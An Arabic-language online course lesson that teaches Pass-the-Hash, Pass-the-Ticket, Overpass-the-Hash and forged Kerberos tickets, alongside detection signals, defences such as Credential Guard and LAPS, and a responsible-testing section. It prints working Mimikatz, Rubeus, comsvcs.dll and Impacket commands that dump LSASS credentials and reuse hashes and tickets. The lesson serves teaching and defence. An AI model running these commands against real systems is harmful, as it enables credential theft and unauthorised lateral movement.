Pass-the-Hash وPass-the-Ticket
إعادة استخدام بيانات الاعتماد المسروقة.
Pass-the-Hash وPass-the-Ticket درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
بيانات اعتماد بلا كلمات مرور
غالبًا لا تتطلب مصادقة Windows كلمة المرور النصية الصريحة عند استخدامها. يمكن لكل من تجزئات NTLM وتذاكر Kerberos إجراء المصادقة بمفردهما. ويستغل المهاجمون ذلك: يسرقون الأثر ثم يعيدون استخدامه.
- Pass-the-Hash (PtH) يعيد استخدام تجزئة NTLM.
- Pass-the-Ticket (PtT) يعيد استخدام تذكرة Kerberos.
- لا تتطلب أيٌّ منهما كسر كلمة المرور.
أماكن وجود بيانات الاعتماد
تُخزَّن مواد بيانات الاعتماد مؤقتًا في الذاكرة وعلى القرص أثناء التشغيل المعتاد. ومن المصادر الشائعة:
- تحتوي ذاكرة عملية LSASS على التجزئات والتذاكر الخاصة بالمستخدمين الذين سجّلوا الدخول.
- تخزّن قاعدة بيانات SAM تجزئات الحسابات المحلية.
- يخزّن الملف NTDS.dit على وحدات تحكم المجال جميع تجزئات المجال.
- خزائن بيانات الاعتماد ومخازن المتصفحات المحمية بواسطة DPAPI.
يُعد تفريغ LSASS أكثر خطوات جمع بيانات الاعتماد شيوعًا.
# Mimikatz: dump logon passwords and hashes
privilege::debug
sekurlsa::logonpasswords
# Comsvcs minidump of lsass (living-off-the-land)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> lsass.dmp fullآلية Pass-the-Hash
تثبت مصادقة NTLM أنك تعرف كلمة المرور باستخدام تجزئتها بوصفها السر في استجابة التحدي. فإذا امتلكت التجزئة، يمكنك إكمال عملية المصافحة من دون معرفة كلمة المرور على الإطلاق.
وهذا يجعل تجزئة NT مكافئة لكلمة المرور. ويمكن الوصول إلى أي خدمة تقبل NTLM باستخدام التجزئة وحدها.
# Mimikatz pass-the-hash spawns a process with injected creds
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NThash> /run:cmd.exe
# Impacket psexec via hash
psexec.py -hashes :<NThash> corp.local/Administrator@10.0.0.20آلية Pass-the-Ticket
تُعد تذاكر Kerberos رموز وصول لحاملها: فمن يملك TGT أو TGS صالحًا يستطيع استخدامه حتى انتهاء صلاحيته. يستخرج المهاجمون التذاكر من LSASS ويحقنونها في جلستهم الخاصة.
- تتيح سرقة TGT طلب تذاكر خدمة بصفتك ذلك المستخدم.
- تمنح سرقة TGS إمكانية الوصول إلى خدمة محددة واحدة.
# Export all tickets, then inject one
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:doIF... (base64 blob)
# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbiOverpass-the-Hash
يربط Overpass-the-Hash (المعروف أيضًا باسم pass-the-key) بين NTLM وKerberos. إذ تستخدم مفتاح NTLM (أو AES) مسروقًا لطلب TGT صالح من Kerberos، ثم تعمل بالكامل ضمن Kerberos.
وهذا أكثر خفاءً من PtH المباشر، لأن حركة المرور الناتجة تبدو كأنها مصادقة Kerberos عادية.
# Rubeus: turn an NTLM hash into a TGT
Rubeus.exe asktgt /user:svc_sql /rc4:<NThash> /ptt
# AES key is even quieter than RC4
Rubeus.exe asktgt /user:svc_sql /aes256:<key> /pttتذاكر Golden وSilver
مع الوصول الأعمق، يزوّر المهاجمون التذاكر بالكامل.
- تذكرة Golden Ticket هي TGT مزوّرة وموقّعة باستخدام تجزئة krbtgt. وتمنح أي هوية صلاحيات، وتظل صالحة حتى تدوير krbtgt مرتين.
- تذكرة Silver Ticket هي TGS مزوّرة لخدمة واحدة، وموقّعة باستخدام تجزئة حساب تلك الخدمة. ولا تلامس وحدة تحكم المجال مطلقًا، ولذلك يصعب رصدها.
- تعدّل تذكرة Diamond Ticket تذكرة TGT صادرة بصورة شرعية لتفادي آليات اكتشاف تزوير التذاكر.
أنماط الحركة الجانبية
تُمكّن بيانات الاعتماد المعاد استخدامها من تنفيذ الحركة الجانبية. وتشمل قنوات التنفيذ الشائعة:
- SMB مع إنشاء خدمة، بأسلوب psexec.
- إنشاء عملية عن بُعد باستخدام WMI.
- WinRM / PowerShell Remoting.
- إنشاء كائنات باستخدام DCOM.
قد تفتح التجزئة أو التذكرة المسروقة نفسها الوصول إلى العديد من المضيفين الذين يكون الحساب مسؤولًا محليًا عليهم.
لماذا يسبب إعادة استخدام المسؤول المحلي ضررًا
إن استخدام كلمة مرور واحدة مشتركة للمسؤول المحلي عبر الأجهزة أمر كارثي. فبمجرد تفريغها مرة واحدة، يمكنك استخدام PtH للدخول إلى كل مضيف يشاركها.
يعالج LAPS هذه المشكلة بتعيين كلمة مرور فريدة ومتجددة للمسؤول المحلي في كل جهاز، وتخزينها في AD مع تقييد صلاحية القراءة.
الاكتشاف
تخلّف هذه الهجمات بيانات رصد إذا راقبت المؤشرات المناسبة.
- نوع تسجيل الدخول
3/9باستخدام NTLM حيث يُتوقع استخدام Kerberos. - الحدث
4624مع seclogon أو استخدام NTLM بطريقة غير معتادة من حسابات ذات صلاحيات مرتفعة. - شذوذ التذاكر: وجود TGS من دون TGT سابق، كما في Silver Ticket، أو تذاكر ذات فترات صلاحية غير معتادة، كما في Golden Ticket.
- الوصول إلى LSASS من عمليات غير قياسية، كما في حدث Sysmon
10.
وسائل الحماية
تركّز عملية التحصين على حماية بيانات الاعتماد وعزلها.
- فعّل Credential Guard لعزل أسرار LSASS في بيئة VBS معزولة.
- أضف الحسابات الحساسة إلى Protected Users لمنع NTLM والتفويض، ولفرض فترة صلاحية قصيرة للتذاكر.
- انشر LAPS وطبّق تقسيم مستويات المسؤولية بحيث لا تصل بيانات اعتماد Tier 0 إلى محطات العمل مطلقًا.
- دوّر
krbtgtمرتين عند الاشتباه في اختراق Golden Ticket.
الاختبار بمسؤولية
يُعد تفريغ LSASS وتزوير التذاكر إجراءين عاليَي التأثير. لا تنفّذهما إلا بتفويض صريح وعلى أهداف متفق عليها. تجنّب تفريغ وحدات تحكم المجال الإنتاجية ما لم تكن مشمولة في النطاق، وأتلف التجزئات والتذاكر التي جُمعت بأمان بعد إعداد التقرير.
وثّق كل عملية لإعادة استخدام بيانات الاعتماد حتى تتمكن فرق الدفاع من التحقق من تفعيل آليات الاكتشاف لديها.
تحقّق سريع
اختبر مدى فهمك لهجمات إعادة استخدام بيانات الاعتماد.
مراجعة
رأيت كيف تتجاوز التجزئات والتذاكر المسروقة كلمات المرور بالكامل.
- يعيد PtH استخدام تجزئات NTLM، بينما يعيد PtT استخدام تذاكر Kerberos.
- يحوّل Overpass-the-hash التجزئة إلى TGT نظيف من Kerberos.
- تُزوَّر تذاكر Golden وSilver وDiamond لتحقيق الاستمرارية.
- يُعد Credential Guard وLAPS وProtected Users وتدوير krbtgt وسائل الحماية الأساسية.
التالي: تحويل موطئ قدم إلى سيطرة كاملة على المجال.
تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا
اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.
- الدورات
- 76
- الدروس
- 303
الأسئلة الشائعة
هل درس «Pass-the-Hash وPass-the-Ticket» مجاني؟
نعم — نص درس «Pass-the-Hash وPass-the-Ticket» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ماذا ستتعلم في «Pass-the-Hash وPass-the-Ticket»؟
إعادة استخدام بيانات الاعتماد المسروقة. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟
لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.
كم من الوقت يستغرق درس «Pass-the-Hash وPass-the-Ticket»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟
نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- مساحة هجوم Active Directory
- Kerberos وKerberoasting
- Pass-the-Hash وPass-the-Ticket
- تصعيد الامتيازات والسيطرة على النطاق